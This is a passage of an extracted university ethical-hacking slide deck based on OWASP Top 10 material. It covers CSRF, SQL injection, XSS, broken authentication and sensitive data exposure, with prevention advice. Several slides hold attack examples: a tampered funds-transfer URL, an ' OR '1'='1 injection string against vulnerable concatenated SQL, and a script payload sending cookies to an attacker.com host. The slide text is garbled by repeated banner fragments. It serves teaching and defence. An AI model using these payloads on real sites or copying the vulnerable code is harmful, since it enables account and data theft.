'

Hacking the Web

Понравилась презентация – покажи это...





Слайд 0

CONTENT LOVINGLY RIPPED FROM OWASP.ORG HACKING THE WEB


Слайд 1

L HACKING CROSS SITE SCRIPTING RGU ETH GU ETHICAL HACKING RGU ETHICAL HACKIN HACKING SQL INJECTION RGU ETHICAL HACK NG RGU ETHICAL HACKINGRGU ETHICAL HAC ACKING COOKIE EDITING RGU ETHICAL HACK RGU ETHICAL HACKINGRGU ETHICAL HACKI L HACKING CROSS SITE REQUEST FORGERY CKING RGU ETHICAL HACKINGRGU ETHICAL ING SENSITIVE DATA EXPOSURE RGU ETHICA HACKING RGU ETHICAL HACKINGRGU ETHIC


Слайд 2

L HACKING CROSS SITE SCRIPTING RGU ETH GU ETHICAL HACKING RGU ETHICAL HACKIN HACKING SQL INJECTION RGU ETHICAL HACK NG RGU ETHICAL HACKINGRGU ETHICAL HAC ACKING COOKIE EDITING RGU ETHICAL HACK RGU ETHICAL HACKINGRGU ETHICAL HACKI L HACKING CROSS SITE REQUEST FORGERY CKING RGU ETHICAL HACKINGRGU ETHICAL ING SENSITIVE DATA EXPOSURE RGU ETHICA HACKING RGU ETHICAL HACKINGRGU ETHIC


Слайд 3

Threat
 Agents Attack
 Vectors Security
 Weaknesses Security
 Controls Technical
 Impacts Business
 Impacts ATTACK WEAKNESS CONTROL ASSETS IMPACT ATTACK WEAKNESS CONTROL FUNCTIONS IMPACT ATTACK WEAKNESS IMPACT WEAKNESS RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 4

Threat
 Agents Attack
 Vectors Security
 Weaknesses Security
 Controls Technical
 Impacts Business
 Impacts RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 5

Threat
 Agents APPLICATION SPECIFIC Attack
 Vectors DIFFICULT Prevalence UNCOMMON Security
 Weaknesses Detectability AVERAGE Technical
 Impacts SEVERE Business
 Impacts APPLICATION SPECIFIC RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 6

Threat
 Agents APPLICATION SPECIFIC Attack
 Vectors DIFFICULT Prevalence UNCOMMON Security
 Weaknesses Detectability AVERAGE Technical
 Impacts SEVERE Business
 Impacts APPLICATION SPECIFIC RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 7

STEPS TO PREVENT Considering the threats you plan to protect this data from (e.g., insider attack, external user), make sure you encrypt all sensitive data at rest and in transit in a manner that defends against these threats. Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you don’t have can’t be stolen. Ensure strong standard algorithms and strong keys are used, and proper key management is in place. Ensure passwords are stored with an algorithm specifically designed for password protection, such as bcrypt, PBKDF2, or scrypt. Disable autocomplete on forms collecting sensitive data and disable caching for pages that contain sensitive data. RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 8

Threat
 Agents APPLICATION SPECIFIC Attack
 Vectors AVERAGE Prevalence COMMON Security
 Weaknesses Detectability EASY Technical
 Impacts MODERATE Business
 Impacts APPLICATION SPECIFIC RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 9

Threat
 Agents APPLICATION SPECIFIC VERY EASY ATTACK. SOMETHING LIKE THIS… Attack
 Vectors AVERAGE HTTP://WWW.MYAMAZINGBANK.COM/TRANSFERFUNDS.PHP?FROM=1234&TO=4321&AMOUNT=500 Prevalence COMMON Security
 Weaknesses CAN BE CHANGED TO THIS EASY HTTP://WWW.MYAMAZINGBANK.COM/TRANSFERFUNDS.PHP?FROM=1234&TO=666&AMOUNT=5000 Technical
 MODERATE Impacts Detectability Business
 Impacts APPLICATION SPECIFIC RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 10

STEPS TO PREVENT The preferred option is to include the unique token in a hidden field. This causes the value to be sent in the body of the HTTP request, avoiding its inclusion in the URL, which is more prone to exposure. The unique token can also be included in the URL itself, or a URL parameter. However, such placement runs a greater risk that the URL will be exposed to an attacker, thus compromising the secret token. Requiring the user to re-authenticate, or prove they are a user (e.g., via a CAPTCHA) can also protect against CSRF. Easiest fix, when dealing with forms, is to change it from GET to POST RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 11

Threat
 Agents APPLICATION SPECIFIC Attack
 Vectors AVERAGE Prevalence WIDESPREAD BROKEN AUTHENTICATION AND SESSION MANAGEMENT Security
 Weaknesses Detectability AVERAGE Technical
 Impacts SEVERE Business
 Impacts APPLICATION SPECIFIC RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 12

STEPS TO PREVENT The primary recommendation for an organisation is to make available to developers: A single set of strong authentication and session management controls. Such controls should strive to: 1. meet all the authentication and session management requirements defined in OWASP’s Application Security Verification Standard (ASVS) areas V2 (Authentication) and V3 (Session Management). 2. have a simple interface for developers. Consider the ESAPI Authenticator and User APIs as good examples to emulate, use, or build upon. RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 13

Threat
 Agents APPLICATION SPECIFIC Attack
 Vectors EASY Prevalence COMMON Security
 Weaknesses Detectability AVERAGE Technical
 Impacts SEVERE Business
 Impacts APPLICATION SPECIFIC RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 14

Threat
 Agents APPLICATION SPECIFIC Attack
 STRING QUERY = "SELECT * FROM ACCOUNTS WHERE CUSTID='" + REQUEST.GETPARAMETER("ID") + "'"; EASY Vectors Prevalence COMMON Security
 Weaknesses Detectability AVERAGE HTTP://EXAMPLE.COM/APP/ACCOUNTVIEW?ID=' OR '1'='1 Technical
 Impacts SEVERE Business
 Impacts APPLICATION SPECIFIC RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 15

Threat
 Agents APPLICATION SPECIFIC Attack
 STRING QUERY = "SELECT * FROM ACCOUNTS WHERE CUSTID='" + REQUEST.GETPARAMETER("ID") + "'"; EASY Vectors Prevalence COMMON Security
 Weaknesses Detectability AVERAGE HTTP://EXAMPLE.COM/APP/ACCOUNTVIEW?ID=' OR '1'='1 Technical
 Impacts SEVERE Business
 Impacts APPLICATION SPECIFIC RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 16

STEPS TO PREVENT Preventing injection requires keeping untrusted data separate from commands and queries. The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterised interface. Be careful with APIs, such as stored procedures, that are parameterised, but can still introduce injection under the hood. If a parameterised API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. OWASP’s ESAPI provides many of these escaping routines. RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 17

Threat
 Agents Attack
 Vectors Prevalence APPLICATION SPECIFIC (STRING) PAGE += "<INPUT NAME='CREDITCARD' TYPE='TEXT' VALUE='" + AVERAGE REQUEST.GETPARAMETER("CC") + "'>"; VERY WIDESPREAD Security
 Weaknesses '><SCRIPT>DOCUMENT.LOCATION= 'HTTP://WWW.ATTACKER.COM/CGI-BIN/COOKIE.CGI ? EASY Detectability FOO='+DOCUMENT.COOKIE</SCRIPT>'. Technical
 Impacts MODERATE Business
 Impacts APPLICATION SPECIFIC RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 18

STEPS TO PREVENT Preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. Positive or “whitelist” input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. For rich content, consider auto-sanitization libraries like the Java HTML Sanitizer Project. Consider Content Security Policy (CSP) to defend against XSS across your entire site. RGU ETHICAL HACKING CROSS SITE SCRIPTING RGU ETHICAL HA AL HACKING SQL INJECTION RGU ETHICAL HACKING RGU ETHICA RGU ETHICAL HACKING COOKIE EDITING RGU ETHICAL HACKING HICAL HACKING CROSS SITE REQUEST FORGERYRGU ETHICAL H KING SENSITIVE DATA EXPOSURE RGU ETHICAL HACKING RGU E


Слайд 19

CROSS SITE SCRIPTING SQL INJECTION COOKIE EDITING CROSS SITE REQUEST FORGERY SENSITIVE DATA EXPOSURE


Слайд 20


×

HTML:





Ссылка: